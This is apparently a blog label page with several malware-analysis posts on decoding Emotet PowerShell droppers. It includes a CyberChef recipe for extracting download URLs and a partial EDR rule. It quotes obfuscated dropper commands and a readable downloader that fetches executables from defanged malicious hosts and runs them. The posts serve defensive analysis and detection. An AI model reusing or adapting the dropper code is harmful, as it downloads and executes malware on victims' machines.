Posts

Showing posts with the label Emotet

Decoding and Extracting URLs from Emotet Powershell (December 2020 Variant)

Some of the latest samples I've been seeing for Emotet look like this app.any.run report. Using CyberChef, we can decode the PowerShell from this sample to extract the download links for the malware:

From_Base64('A-Za-z0-9+/=',true)
Remove_null_bytes()
Find_/_Replace({'option':'Regex','string':'[`\'+()]'},'',true,false,true,false)
Find_/_Replace({'option':'Regex','string':'\\]e1r\\[S'},'http',true,false,true,false)
Extract_URLs(false)
Find_/_Replace({'option':'Simple string','string':'@'},'\\r',true,false,true,false)

Of course some of the "replace strings" will vary, so this recipe will have to be changed in certain places at times. Some other additional items to look at, from an EDR perspective, might be: Rule 1: ParentProcess contains Rundll32.exe AND process contains Rundll32.exe AND ProcessPa...

July 2018, Emotet Encoded Powershell Observed

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could simply run them through a sandbox, but I like to really understand the obfuscation for myself, which is why I take the time to reverse it a little bit and to share how I go about it. I will say that since I started using CyberChef, it almost feels like cheating in a way. I had a Python script that I kept updating to look for signs of known Emotet encodings I've observed and then decode them. I was up to version 8 of my script; I still write this stuff to keep in practice, but I find CyberChef to be a much faster method for "writing" a decoder of sorts. So, the new variant I observed looks like this: powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( '[R]VDbagIxEP2VfQhEsZv0oVAwLA...

June 2018, Emotet encoding observed and decoded

Nothing earth-shattering to report here; I just wanted to share the latest Emotet encoded PowerShell command and one simple way to decode it to extract the Stage 2 download links. I know a lot of these obfuscated PowerShell commands can be easily decoded by simply using the write-host command; however, I do like to try different ways to reverse the obfuscation, as I think it makes for a good analyst exercise. The PowerShell command is encoded as: POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68...

September 2017, Decoding the latest Emotet Powershell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before: an email phish with a link, and the link downloads a malicious document. The document, usually a malicious Word document, uses VBA to build and execute a PowerShell command, which then downloads the next stage of infection. This used to be very simple to see; for example, older observed variants produced the following PowerShell: powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Ex...